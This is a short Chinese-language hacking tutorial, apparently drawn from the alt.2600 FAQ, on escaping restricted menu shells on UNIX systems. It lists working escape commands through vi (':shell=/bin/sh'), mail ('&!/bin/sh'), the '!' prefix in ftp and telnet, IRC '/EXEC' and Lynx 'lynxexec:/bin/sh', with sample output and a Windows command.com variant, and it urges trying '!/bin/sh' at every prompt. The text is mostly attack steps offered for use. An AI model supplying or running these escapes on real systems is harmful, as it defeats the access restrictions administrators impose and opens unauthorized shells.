在菜单中得到SHELL用户（UNIX）？

1.1有权使用 "vi" 程序（来自ALT.2600问题解答)
VI是一个强有力的文本编辑器，你可能有机会使用。你就有可能得到一个SHELL。
在VI状态下输入以下命令：

:shell=/bin/sh
然后再运行SHELL这个命令：
:shell

注释： 如果你的SHELL被限制运行 " CD "命令，那么请使用FTP来得到，这就可以了。

有权使用 "mail" 程序

如果你有权利使用 "mail" 程序来写信请按照下面一步步做:
在菜单选项上运行"mail"程序。

实例：
1.Email (mail) <--------选择这一项到
Email No mail for user1.....
(他会自动地返回选项菜单)

所以在此之前，你要写一封信给你自己

1.Email (mail) <--------选择这一项到
Email Mail version ?. Type ? for help.
"/var/spool/mail/user1": 1 messages

> 1 ck@my.host.edu Thu Sep 1 1:11 1/99 "test"
&

Ok,现在我们停留在 mail 的 "&" 提示符下，那么现在只需要输入以下命令：
&!/bin/sh[回车]
$ <------------ 终于不用再见到那该死的菜单了 ^_^

注释： 许多程序里字符 "!" 可以直接制定和运行一个 SHELL 命令，在合式的一个场合中 你可以运行 "/bin/sh" 去得到一个 shell。

FTP and Telnet FTP and Telnet 他们同样有能力在提示符下运用字符 "!" 来执行命令:

ftp> !ps <-------- !(command)
PID TT STAT TIME COMMAND
2679 p2 S 0:01 -menu
2832 p2 R 0:00 ps

telnet>!ps
PID TT STAT TIME COMMAND
2679 p2 S 0:01 -menu
2832 p2 R 0:00 ps

在一些用户的初始配置文件里，并不会为你配置所有命令的绝对路径，那么当你要运行一个程序 时，如果你的配置文件里路径查找不到它将不会执行。这个时候你就要输入这个程序的绝对路 径了。

实例：
ftp> !/usr/bin/ps
PID TT STAT TIME COMMAND
2679 p2 S 0:01 -menu
2832 p2 R 0:00 ps

ftp> !/usr/bin/ps
PID TT STAT TIME COMMAND
2679 p2 S 0:01 -menu
2832 p2 R 0:00 ps

注释：无论何时都要设法执行 !/bin/sh

注释： WIN95/98 AND NT：

ftp>!command.com Microsoft
Microsoft Windows NT DOS
Copyright Microsoft Corp 1990-1996.

C:\>

IRC

如果有限制的 SHELL 菜单里可以运行执行 IRC client (Internet Relay Chat)
当在登录的时候，你可以执行任何命令
/EXEC (command)

Lynx 可以使用以下命令 lynxexec and lynxprog:

实例:
lynxexec:ls -l
lynxprog:news
lynxexec:/bin/sh

实例: lynx lynxexec://localhost/finger

PS：如有出错，请各位大客指出。